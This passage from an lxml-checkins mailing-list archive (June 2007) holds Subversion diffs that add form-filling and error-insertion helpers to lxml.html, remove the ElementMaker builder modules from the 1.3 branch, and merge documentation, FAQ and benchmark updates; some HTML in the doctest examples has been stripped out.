simplest kind of filling is just filling an input with a value: + + >>> print fill_form_html(''' + ...
''', dict(foo='bar')) +
+ +You can also fill multiple inputs, like: + + >>> print fill_form_html(''' + ...
+ ... + ... + ...
''', dict(foo=['bar1', 'bar2'])) +
+ + +
+ +Checkboxes can work either as boolean true/false, or be selected based +on their inclusion in a set of values:: + + >>> print fill_form_html(''' + ...
+ ... Would you like to be spammed? + ...
+ ... Spam you'd like to receive:
+ ... Viagra spam: + ...
+ ... Stock spam: + ...
+ ... Other spam: + ...
+ ... + ...
''', dict(spam_me=True, type=['viagra', 'other'])) +
+ Would you like to be spammed? +
+ Spam you'd like to receive:
+ Viagra spam: +
+ Stock spam: +
+ Other spam: +
+ +
+ +FIXME: I need to test more of this. But I'm lazy and want to use the +coverage report for some of this. From ianb at codespeak.net Fri Jun 15 00:53:28 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 15 Jun 2007 00:53:28 +0200 (CEST) Subject: [Lxml-checkins] r44258 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070614225328.4F0058280@code0.codespeak.net> Author: ianb Date: Fri Jun 15 00:53:28 2007 New Revision: 44258 Modified: lxml/branch/html/src/lxml/html/formfill.py lxml/branch/html/src/lxml/html/tests/test_formfill.txt Log: Added error-filling function Modified: lxml/branch/html/src/lxml/html/formfill.py ============================================================================== --- lxml/branch/html/src/lxml/html/formfill.py (original) +++ lxml/branch/html/src/lxml/html/formfill.py Fri Jun 15 00:53:28 2007 @@ -1,5 +1,6 @@ -from lxml.etree import XPath -from lxml.html import HTML, tostring +from lxml.etree import XPath, ElementBase +from lxml.html import parse, tostring +from lxml.html import defs __all__ = ['FormNotFound', 'fill_form'] @@ -10,6 +11,8 @@ _form_name_xpath = XPath('descendant-or-self::form[name=$name]') _input_xpath = XPath('descendant-or-self::input | descendant-or-self::select | descendant-or-self::textarea') +_label_for_xpath = XPath('//label[@for=$for_id]') +_name_xpath = XPath('descendant-or-self::*[@name=$name]') def fill_form( el, @@ -22,7 +25,7 @@ def fill_form_html(html, values, form_id=None, form_index=None): if isinstance(html, basestring): - doc = HTML(html) + doc = parse(html) return_string = True else: doc = copy.deepcopy(html) @@ -164,3 +167,130 @@ yield form.get('name') else: yield '(unnamed form %s)' % index + +############################################################ +## Error filling +############################################################ + +class DefaultErrorCreator(object): + insert_before = True + block_inside = True + error_container_tag = 'div' + error_message_class = 'error-message' + error_block_class = 'error-block' + default_message = "Invalid" + + def __init__(self, **kw): + for name, value in kw.items(): + if not hasattr(self, name): + raise TypeError( + "Unexpected keyword argument: %s" % name) + setattr(self, name, value) + + def __call__(self, el, is_block, message): + error_el = el.makeelement(self.error_container_tag) + if self.error_message_class: + error_el.set('class', self.error_message_class) + if is_block and self.error_block_class: + error_el.set('class', error_el.get('class', '')+' '+self.error_block_class) + if message is None or message == '': + message = self.default_message + if isinstance(message, ElementBase): + error_el.append(message) + else: + assert isinstance(message, basestring), ( + "Bad message; should be a string or element: %r" % message) + error_el.text = message or self.default_message + if is_block and self.block_inside: + if self.insert_before: + error_el.tail = el.text + el.text = None + el.insert(0, error_el) + else: + el.append(error_el) + else: + parent = el.getparent() + pos = parent.index(el) + if self.insert_before: + parent.insert(pos, error_el) + else: + error_el.tail = el.tail + el.tail = None + parent.insert(pos+1, error_el) + +default_error_creator = DefaultErrorCreator() + + +def insert_errors( + el, + errors, + form_id=None, + form_index=None, + error_class="error", + error_creator=default_error_creator, + ): + el = _find_form(el, form_id=form_id, form_index=form_index) + for name, error in errors.iteritems(): + if error is None: + continue + for error_el, message in _find_elements_for_name(el, name, error): + assert isinstance(message, (basestring, type(None), ElementBase)), ( + "Bad message: %r" % message) + _insert_error(error_el, message, error_class, error_creator) + +def insert_errors_html(html, values, **kw): + if isinstance(html, basestring): + doc = parse(html) + return_string = True + else: + doc = copy.deepcopy(html) + return_string = False + insert_errors(doc, values, **kw) + if return_string: + return tostring(doc) + else: + return doc + +def _insert_error(el, error, error_class, error_creator): + if el.tag in defs.empty_tags or el.tag == 'textarea': + is_block = False + else: + is_block = True + if el.tag != 'form' and error_class: + _add_class(el, error_class) + if el.get('id'): + labels = _label_for_xpath(el, for_id=el.get('id')) + if labels: + for label in labels: + _add_class(label, error_class) + error_creator(el, is_block, error) + +def _add_class(el, class_name): + if el.get('class'): + el.set('class', el.get('class')+' '+class_name) + else: + el.set('class', class_name) + +def _find_elements_for_name(form, name, error): + if name is None: + # An error for the entire form + yield form, error + return + if name.startswith('#'): + # By id + el = form.get_element_by_id(name[1:]) + if el is not None: + yield el, error + return + els = _name_xpath(form, name=name) + if not els: + # FIXME: should this raise an exception? + return + if not isinstance(error, (list, tuple)): + yield els[0], error + return + # FIXME: if error is longer than els, should it raise an error? + for el, err in zip(els, error): + if err is None: + continue + yield el, err Modified: lxml/branch/html/src/lxml/html/tests/test_formfill.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_formfill.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_formfill.txt Fri Jun 15 00:53:28 2007 @@ -52,3 +52,49 @@ FIXME: I need to test more of this. But I'm lazy and want to use the coverage report for some of this. + + +This module also allows you to add error messages to the form. The errors +add an "error" class to the input fields, and any labels if the field +has a label. It also inserts an error message into the form, using a +function you can provide (or the default function). + +Example:: + + >>> from lxml.html.formfill import insert_errors_html + >>> print insert_errors_html(''' + ...
+ ...
+ ...
+ ... + ...
+ ...
+ ... + ... + ... + ... + ...
''', { + ... 'v1': "err1", + ... 'v2': "err2", + ... 'v3': [None, "err3-2"], + ... 'v4': "err4", + ... None: 'general error', + ... '#fieldset': 'area error', + ... }) +
+
general error
+
+
area error
+
err1
+
+ +
err2
+
+
+ +
err3-2
+ +
err4
+ + +
From scoder at codespeak.net Fri Jun 15 10:25:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 10:25:31 +0200 (CEST) Subject: [Lxml-checkins] r44265 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070615082531.CB566806D@code0.codespeak.net> Author: scoder Date: Fri Jun 15 10:25:31 2007 New Revision: 44265 Removed: lxml/branch/lxml-1.3/src/lxml/builder.py lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Log: removed FL's builder modules from 1.3 Deleted: /lxml/branch/lxml-1.3/src/lxml/builder.py ============================================================================== --- /lxml/branch/lxml-1.3/src/lxml/builder.py Fri Jun 15 10:25:31 2007 +++ (empty file) @@ -1,161 +0,0 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" - -import etree as ET - -try: - from functools import partial -except ImportError: - # fake it for pre-2.5 releases - def partial(func, tag): - return lambda *args, **kwargs: func(tag, *args, **kwargs) - - -class _C: - pass - -class ElementMaker(object): - """Element generator factory. - - Unlike the ordinary Element factory, the E factory allows you to pass in - more than just a tag and some optional attributes; you can also pass in - text and other elements. The text is added as either text or tail - attributes, and elements are inserted at the right spot. Some small - examples:: - - >>> from lxml import etree as ET - >>> from lxml.builder import E - - >>> ET.tostring(E("tag")) - '' - >>> ET.tostring(E("tag", "text")) - 'text' - >>> ET.tostring(E("tag", "text", key="value")) - 'text' - >>> ET.tostring(E("tag", E("subtag", "text"), "tail")) - 'texttail' - - For simple tags, the factory also allows you to write ``E.tag(...)`` instead - of ``E('tag', ...)``:: - - >>> ET.tostring(E.tag()) - '' - >>> ET.tostring(E.tag("text")) - 'text' - >>> ET.tostring(E.tag(E.subtag("text"), "tail")) - 'texttail' - - Here's a somewhat larger example; this shows how to generate HTML - documents, using a mix of prepared factory functions for inline elements, - nested ``E.tag`` calls, and embedded XHTML fragments:: - - # some common inline elements - A = E.a - I = E.i - B = E.b - - def CLASS(v): - # helper function, 'class' is a reserved word - return {'class': v} - - page = ( - E.html( - E.head( - E.title("This is a sample document") - ), - E.body( - E.h1("Hello!", CLASS("title")), - E.p("This is a paragraph with ", B("bold"), " text in it!"), - E.p("This is another paragraph, with a ", - A("link", href="http://www.python.org"), "."), - E.p("Here are some reservered characters: ."), - ET.XML("

And finally, here is an embedded XHTML fragment.

"), - ) - ) - ) - - print ET.tostring(page) - - Here's a prettyprinted version of the output from the above script:: - - - - This is a sample document - - -

Hello!

-

This is a paragraph with bold text in it!

-

This is another paragraph, with link.

-

Here are some reservered characters: <spam&egg>.

-

And finally, here is an embedded XHTML fragment.

- - - """ - - def __init__(self, typemap=None): - # initialize type map for this element factory - - if typemap: - typemap = typemap.copy() - else: - typemap = {} - - def add_text(elem, item): - if len(elem): - elem[-1].tail = (elem[-1].tail or "") + item - else: - elem.text = (elem.text or "") + item - typemap[str] = typemap[unicode] = add_text - - def add_dict(elem, item): - attrib = elem.attrib - for k, v in item.items(): - if isinstance(v, basestring): - attrib[k] = v - else: - attrib[k] = typemap[type(v)](None, v) - typemap[dict] = add_dict - - def add_elem(elem, item): - elem.append(item) - t = type(ET.Element("tag")) - if t is not type(_C()): - typemap[t] = add_elem - - self._typemap = typemap - - # print typemap - - def __call__(self, tag, *children, **attrib): - get = self._typemap.get - - elem = ET.Element(tag) - if attrib: - get(dict)(elem, attrib) - - for item in children: - if callable(item): - item = item() - t = get(type(item)) - if t is None: - if ET.iselement(item): - elem.append(item) - continue - raise TypeError("bad argument type: %r" % item) - else: - v = t(elem, item) - if v: - get(type(v))(elem, v) - - return elem - - def __getattr__(self, tag): - return partial(self, tag) - -# create factory object -E = ElementMaker() Deleted: /lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py ============================================================================== --- /lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Fri Jun 15 10:25:31 2007 +++ (empty file) @@ -1,125 +0,0 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh - -Usage:: - - >>> from lxml.htmlbuilder import * - >>> html = HTML( - ... HEAD( TITLE("Hello World") ), - ... BODY( CLASS("main"), - ... H1("Hello World !") - ... ) - ... ) - - >>> import lxml.etree - >>> print lxml.etree.tostring(html, pretty_print=True) - - - Hello World - - -

Hello World !

- - - -""" - -from builder import E - -# elements -A = E.a # anchor -ABBR = E.abbr # abbreviated form (e.g., WWW, HTTP, etc.) -ACRONYM = E.acronym # -ADDRESS = E.address # information on author -APPLET = E.applet # Java applet (DEPRECATED) -AREA = E.area # client-side image map area -B = E.b # bold text style -BASE = E.base # document base URI -BASEFONT = E.basefont # base font size (DEPRECATED) -BDO = E.bdo # I18N BiDi over-ride -BIG = E.big # large text style -BLOCKQUOTE = E.blockquote # long quotation -BODY = E.body # document body -BR = E.br # forced line break -BUTTON = E.button # push button -CAPTION = E.caption # table caption -CENTER = E.center # shorthand for DIV align=center (DEPRECATED) -CITE = E.cite # citation -CODE = E.code # computer code fragment -COL = E.col # table column -COLGROUP = E.colgroup # table column group -DD = E.dd # definition description -DEL = getattr(E, 'del') # deleted text -DFN = E.dfn # instance definition -DIR = E.dir # directory list (DEPRECATED) -DIV = E.div # generic language/style container -DL = E.dl # definition list -DT = E.dt # definition term -EM = E.em # emphasis -FIELDSET = E.fieldset # form control group -FONT = E.font # local change to font (DEPRECATED) -FORM = E.form # interactive form -FRAME = E.frame # subwindow -FRAMESET = E.frameset # window subdivision -H1 = E.h1 # heading -H2 = E.h2 # heading -H3 = E.h3 # heading -H4 = E.h4 # heading -H5 = E.h5 # heading -H6 = E.h6 # heading -HEAD = E.head # document head -HR = E.hr # horizontal rule -HTML = E.html # document root element -I = E.i # italic text style -IFRAME = E.iframe # inline subwindow -IMG = E.img # Embedded image -INPUT = E.input # form control -INS = E.ins # inserted text -ISINDEX = E.isindex # single line prompt (DEPRECATED) -KBD = E.kbd # text to be entered by the user -LABEL = E.label # form field label text -LEGEND = E.legend # fieldset legend -LI = E.li # list item -LINK = E.link # a media-independent link -MAP = E.map # client-side image map -MENU = E.menu # menu list (DEPRECATED) -META = E.meta # generic metainformation -NOFRAMES = E.noframes # alternate content container for non frame-based rendering -NOSCRIPT = E.noscript # alternate content container for non script-based rendering -OBJECT = E.object # generic embedded object -OL = E.ol # ordered list -OPTGROUP = E.optgroup # option group -OPTION = E.option # selectable choice -P = E.p # paragraph -PARAM = E.param # named property value -PRE = E.pre # preformatted text -Q = E.q # short inline quotation -S = E.s # strike-through text style (DEPRECATED) -SAMP = E.samp # sample program output, scripts, etc. -SCRIPT = E.script # script statements -SELECT = E.select # option selector -SMALL = E.small # small text style -SPAN = E.span # generic language/style container -STRIKE = E.strike # strike-through text (DEPRECATED) -STRONG = E.strong # strong emphasis -STYLE = E.style # style info -SUB = E.sub # subscript -SUP = E.sup # superscript -TABLE = E.table # -TBODY = E.tbody # table body -TD = E.td # table data cell -TEXTAREA = E.textarea # multi-line text field -TFOOT = E.tfoot # table footer -TH = E.th # table header cell -THEAD = E.thead # table header -TITLE = E.title # document title -TR = E.tr # table row -TT = E.tt # teletype or monospaced text style -U = E.u # underlined text style (DEPRECATED) -UL = E.ul # unordered list -VAR = E.var # instance of a variable or program argument - -# attributes (only reserved words are included here) -ATTR = dict -def CLASS(v): return {'class': v} -def FOR(v): return {'for': v} From scoder at codespeak.net Fri Jun 15 11:19:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:19:26 +0200 (CEST) Subject: [Lxml-checkins] r44274 - in lxml/branch/lxml-1.3: . benchmark doc src/lxml src/lxml/tests Message-ID: <20070615091926.C2DD3828B@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:19:25 2007 New Revision: 44274 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/benchmark/bench_etree.py lxml/branch/lxml-1.3/benchmark/bench_xpath.py lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/main.txt lxml/branch/lxml-1.3/doc/mkhtml.py lxml/branch/lxml-1.3/doc/objectify.txt lxml/branch/lxml-1.3/doc/performance.txt lxml/branch/lxml-1.3/doc/validation.txt lxml/branch/lxml-1.3/doc/xpathxslt.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/classlookup.pxi lxml/branch/lxml-1.3/src/lxml/dtd.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd lxml/branch/lxml-1.3/src/lxml/extensions.pxi lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/parser.pxi lxml/branch/lxml-1.3/src/lxml/public-api.pxi lxml/branch/lxml-1.3/src/lxml/relaxng.pxi lxml/branch/lxml-1.3/src/lxml/sax.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi Log: big manual merge of loads of small stuff that was left out in the last trunk merges Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 15 11:19:25 2007 @@ -8,6 +8,8 @@ Features added -------------- +* ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. + * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Fri Jun 15 11:19:25 2007 @@ -1,3 +1,7 @@ +=============== +ToDo's for lxml +=============== + lxml ==== @@ -12,8 +16,6 @@ * test namespaces more in-depth -* will namespace nodes of unknown namespaces be added (and never freed?) - * more testing on multi-threading Modified: lxml/branch/lxml-1.3/benchmark/bench_etree.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_etree.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_etree.py Fri Jun 15 11:19:25 2007 @@ -212,10 +212,14 @@ child[:] @children + @with_attributes(True, False) + @with_text(utext=True, text=True, no_text=True) def bench_deepcopy(self, children): for child in children: copy.deepcopy(child) + @with_attributes(True, False) + @with_text(utext=True, text=True, no_text=True) def bench_deepcopy_all(self, root): copy.deepcopy(root) Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_xpath.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_xpath.py Fri Jun 15 11:19:25 2007 @@ -39,32 +39,33 @@ @onlylib('lxe') @children def bench_xpath_old_extensions(self, children): - def return_child(_, element): - if element: - return element[0] + def return_child(_, elements): + if elements: + return elements[0][0] else: return () - extensions = {(None, 'child') : return_child} - xpath = self.etree.XPath("child(.)", extensions=extensions) + extensions = {("test", "child") : return_child} + xpath = self.etree.XPath("t:child(.)", namespaces={"test":"t"}, + extensions=extensions) for child in children: xpath(child) @onlylib('lxe') @children def bench_xpath_extensions(self, children): - def return_child(_, element): - if element: - return element[0] + def return_child(_, elements): + if elements: + return elements[0][0] else: return () - self.etree.FunctionNamespace("test")["t"] = return_child + self.etree.FunctionNamespace("testns")["t"] = return_child try: - xpath = self.etree.XPath("test:t(.)", {"test":"test"}) + xpath = self.etree.XPath("test:t(.)", {"test":"testns"}) for child in children: xpath(child) finally: - del self.etree.FunctionNamespace("test")["t"] + del self.etree.FunctionNamespace("testns")["t"] if __name__ == '__main__': benchbase.main(XPathBenchMark) Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Fri Jun 15 11:19:25 2007 @@ -2,6 +2,12 @@ Frequently Asked Questions (FAQ) ================================ +.. meta:: + :description: Frequently Asked Questions about lxml (FAQ) + :keywords: lxml, lxml.etree, FAQ, frequently asked questions + :authors: Stefan Behnel, and various people on the mailing list + + See also the notes on compatibility_ to ElementTree_. .. _compatibility: compatibility.html @@ -22,7 +28,7 @@ 2.1 Why is lxml not written in Python? 2.2 How can I contribute? 3 Bugs - 3.1 My application crashes! Why does lxml.etree do that? + 3.1 My application crashes! 3.2 I think I have found a bug in lxml. What should I do? 4 Threading 4.1 Can I use threads to concurrently access the lxml API? @@ -272,45 +278,68 @@ Bugs ==== -My application crashes! Why does lxml.etree do that? ----------------------------------------------------- +My application crashes! +----------------------- One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. Please report this bug to the `mailing list`_. See the next section on how to do that. +However, there are a few things to try first, to make sure the problem is +really within lxml (or libxml2 or libxslt): -I think I have found a bug in lxml. What should I do? ------------------------------------------------------ +a) If your application (or e.g. your web container) uses threads, please see + the FAQ section on threading to check if you touch on one of the + potential pitfalls. + +b) If you are on Mac-OS X, make sure lxml uses the correct libraries. If you + have updated the old system libraries (e.g. through fink), this is best + achieved by building lxml statically to prevent the different library + versions from interfering. If you choose to use a dynamically linked + version, make sure the ``DYLD_LIBRARY_PATH`` environment variable + contains the directory where you installed the libraries. + +In any case, try to reproduce the problem with the latest versions of +libxml2 and libxslt. From time to time, bugs and race conditions are found +in these libraries, so a more recent version might already contain a fix for +your problem. -a) First, you should look at the `current developer changelog`_ to see if this - is a known problem that has already been fixed in the SVN trunk. - .. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt - -b) If you are using threads, please see the following section to check if - you touch on one of the potential pitfalls. +I think I have found a bug in lxml. What should I do? +----------------------------------------------------- -c) Try to reproduce the problem with the latest versions of libxml2 and - libxslt. From time to time, bugs and race conditions are found in these - libraries, so a more recent version might already contain a fix for your - problem. - -d) Otherwise, we would really like to hear about it. Please report it to the - `mailing list`_ so that we can fix it. It is very helpful in this case if - you can come up with a short code snippet that demonstrates your problem. - Please also report the version of lxml, libxml2 and libxslt that you are - using by calling this:: - - from lxml import etree - print "lxml.etree: ", etree.LXML_VERSION - print "libxml used: ", etree.LIBXML_VERSION - print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION - print "libxslt used: ", etree.LIBXSLT_VERSION - print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION +First, you should look at the `current developer changelog`_ to see if this +is a known problem that has already been fixed in the SVN trunk since the +release you are using. + +.. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + +Also, the 'crash' section above has a few good advices what to try to see if +the problem is really in lxml - and not in your setup. Believe it or not, +that happens more often than you might think, especially when old libraries +or even multiple library versions are installed. + +You should always try to reproduce the problem with the latest versions of +libxml2 and libxslt - and make sure they are used (``lxml.etree`` can tell +you what it runs with, see below). + +Otherwise, we would really like to hear about it. Please report it to the +`mailing list`_ so that we can fix it. It is very helpful in this case if +you can come up with a short code snippet that demonstrates your problem. +If others can reproduce and see the problem, it is much easier for them to +fix it - and maybe even easier for you to describe it and get people +convinced that it really is a problem to fix. Please also report the +version of lxml, libxml2 and libxslt that you are using by calling this:: + + from lxml import etree + print "lxml.etree: ", etree.LXML_VERSION + print "libxml used: ", etree.LIBXML_VERSION + print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION + print "libxslt used: ", etree.LIBXSLT_VERSION + print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION - .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev Threading Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Fri Jun 15 11:19:25 2007 @@ -265,18 +265,44 @@ -By default, lxml (and ElementTree) output the XML declaration only if it is -required. You can enable or disable it explicitly by passing another keyword -argument for the serialisation:: +By default, lxml (just as ElementTree) outputs the XML declaration only if it +is required by the standard:: - >>> print etree.tostring(root, xml_declaration=True) - - + >>> unicode_root = etree.Element(u"t\u1234st") + >>> unicode_root.text = u"t\u4321st" + >>> etree.tostring(unicode_root, encoding="utf-8") + 't\xe4\x8c\xa1st' + + >>> print etree.tostring(unicode_root, encoding="iso-8859-1") + + t䌡st Also see the general remarks on `Unicode support`_. .. _`Unicode support`: parsing.html#python-unicode-strings +You can enable or disable the declaration explicitly by passing another +keyword argument for the serialisation:: + + >>> print etree.tostring(root, xml_declaration=True) + + + + >>> etree.tostring(unicode_root, encoding="utf-8", + ... xml_declaration=False) + 't\xe4\x8c\xa1st' + +Note that a standard compliant XML parser will not consider the last line +well-formed XML if the encoding is not explicitly provided somehow, e.g. in an +underlying transport protocol:: + + >>> notxml = etree.tostring(unicode_root, encoding="utf-8", + ... xml_declaration=False) + >>> etree.XML(notxml) + Traceback (most recent call last): + ... + XMLSyntaxError: line 1: Extra content at the end of the document + XInclude and ElementInclude --------------------------- Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Fri Jun 15 11:19:25 2007 @@ -4,8 +4,8 @@ .. contents:: .. 1 Introduction - 2 Download - 3 Documentation + 2 Documentation + 3 Download 4 Mailing list 5 License 6 Old Versions @@ -25,42 +25,6 @@ .. _FAQ: FAQ.html -Download --------- - -The best way to download binary versions is to visit `lxml at the Python -cheeseshop`_. It has the source, eggs and installers for various platforms. -The source distribution is signed with `this key`_. - -.. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ -.. _`this key`: pubkey.asc - -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). -`Older versions`_ are listed below. - -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html -.. _`Older versions`: #old-versions - -Please take a look at the `installation instructions`_! - -.. _`installation instructions`: installation.html - -It's also possible to check out the latest development version of lxml -from svn directly, using a command like this:: - - svn co http://codespeak.net/svn/lxml/trunk lxml - -You can also `browse it through the web`_. Please read `how to build lxml -from source`_ first. The `latest CHANGES`_ of the developer version are also -accessible. You can check there if a bug you found has been fixed or a -feature you want has been implemented in the latest trunk version. - -.. _`how to build lxml from source`: build.html -.. _`browse it through the web`: http://codespeak.net/svn/lxml -.. _`latest CHANGES`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt - - Documentation ------------- @@ -74,6 +38,8 @@ * lxml.etree: + * the `lxml.etree Tutorial`_ + * `lxml.etree specific API`_ documentation * parsing_ and validating_ XML @@ -95,17 +61,19 @@ * a brief comparison of `objectify and etree`_ lxml.etree follows the ElementTree_ API as much as possible, building it on -top of the native libxml2 tree. See also the ElementTree compatibility_ -overview and the `benchmark results`_ comparing lxml to the original -ElementTree_ and cElementTree_ implementations. - -Right after the ElementTree_ documentation, the most important place to look -is the `lxml.etree specific API`_ documentation. It describes how lxml extends the -ElementTree API to expose libxml2 and libxslt specific functionality, such as -XPath_, `Relax NG`_, `XML Schema`_, `XSLT`_, and `c14n`_. Python code can be -called from XPath expressions and XSLT stylesheets through the use of -`extension functions`_. lxml also offers a `SAX compliant API`_, that works -with the SAX support in the standard library. +top of the native libxml2 tree. If you are new to ElementTree, start with the +`lxml.etree Tutorial`_. See also the ElementTree compatibility_ overview and +the `benchmark results`_ comparing lxml to the original ElementTree_ and +cElementTree_ implementations. + +Right after the `lxml.etree Tutorial`_ and the ElementTree_ documentation, the +most important place to look is the `lxml.etree specific API`_ documentation. +It describes how lxml extends the ElementTree API to expose libxml2 and +libxslt specific functionality, such as XPath_, `Relax NG`_, `XML Schema`_, +`XSLT`_, and `c14n`_. Python code can be called from XPath expressions and +XSLT stylesheets through the use of `extension functions`_. lxml also offers +a `SAX compliant API`_, that works with the SAX support in the standard +library. There is a separate module `lxml.objectify`_ that implements a data-binding API on top of lxml.etree. See the `objectify and etree`_ FAQ entry for a @@ -120,6 +88,7 @@ .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm +.. _`lxml.etree Tutorial`: tutorial.html .. _`benchmark results`: performance.html .. _`compatibility`: compatibility.html .. _`lxml.etree specific API`: api.html @@ -140,6 +109,42 @@ .. _`c14n`: http://www.w3.org/TR/xml-c14n +Download +-------- + +The best way to download binary versions is to visit `lxml at the Python +cheeseshop`_. It has the source, eggs and installers for various platforms. +The source distribution is signed with `this key`_. + +.. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ +.. _`this key`: pubkey.asc + +The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +`Older versions`_ are listed below. + +.. _`lxml 1.3beta`: lxml-1.3beta.tgz +.. _`CHANGES for 1.3beta`: changes-1.3beta.html +.. _`Older versions`: #old-versions + +Please take a look at the `installation instructions`_! + +.. _`installation instructions`: installation.html + +It's also possible to check out the latest development version of lxml +from svn directly, using a command like this:: + + svn co http://codespeak.net/svn/lxml/trunk lxml + +You can also `browse it through the web`_. Please read `how to build lxml +from source`_ first. The `latest CHANGES`_ of the developer version are also +accessible. You can check there if a bug you found has been fixed or a +feature you want has been implemented in the latest trunk version. + +.. _`how to build lxml from source`: build.html +.. _`browse it through the web`: http://codespeak.net/svn/lxml +.. _`latest CHANGES`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + + Mailing list ------------ Modified: lxml/branch/lxml-1.3/doc/mkhtml.py ============================================================================== --- lxml/branch/lxml-1.3/doc/mkhtml.py (original) +++ lxml/branch/lxml-1.3/doc/mkhtml.py Fri Jun 15 11:19:25 2007 @@ -4,10 +4,11 @@ SITE_STRUCTURE = [ ('lxml', ('main.txt', 'intro.txt', 'FAQ.txt', 'compatibility.txt', 'performance.txt', 'build.txt')), - ('Developing with lxml', ('api.txt', 'parsing.txt', 'validation.txt', - 'xpathxslt.txt', 'objectify.txt')), - ('Extending lxml', ('resolvers.txt', 'extensions.txt', 'element_classes.txt', - 'sax.txt', 'capi.txt')), + ('Developing with lxml', ('tutorial.txt', 'api.txt', 'parsing.txt', + 'validation.txt', 'xpathxslt.txt', + 'objectify.txt')), + ('Extending lxml', ('resolvers.txt', 'extensions.txt', + 'element_classes.txt', 'sax.txt', 'capi.txt')), ] RST2HTML_OPTIONS = " ".join([ Modified: lxml/branch/lxml-1.3/doc/objectify.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/objectify.txt (original) +++ lxml/branch/lxml-1.3/doc/objectify.txt Fri Jun 15 11:19:25 2007 @@ -2,6 +2,9 @@ lxml.objectify ============== +:Authors: + Stefan Behnel, Holger Joukl + lxml supports an alternative API similar to the Amara_ bindery or gnosis.xml.objectify_ through a custom Element implementation. The main idea is to hide the usage of XML behind normal Python objects, sometimes referred @@ -17,27 +20,35 @@ not be mixed with other element implementations, to avoid non-obvious behaviour. +The `benchmark page`_ has some hints on performance optimisation of code using +lxml.objectify. + .. _Amara: http://uche.ogbuji.net/tech/4suite/amara/ .. _gnosis.xml.objectify: http://gnosis.cx/download/ +.. _`benchmark page`: performance.html#lxml-objectify .. contents:: .. - 1 Setting up lxml.objectify - 2 Creating objectify trees - 3 Element access through object attributes - 4 Namespace handling - 5 ObjectPath - 6 Python data types - 7 Defining additional data classes - 8 Recursive string representation of elements - 9 What is different from ElementTree? - 10 Resetting the API + 1 Setting up lxml.objectify + 2 The lxml.objectify API + 2.1 Creating objectify trees + 2.2 Element access through object attributes + 2.3 Namespace handling + 3 ObjectPath + 4 Python data types + 4.1 Recursive tree dump + 4.2 Recursive string representation of elements + 5 How data types are matched + 5.1 Type annotations + 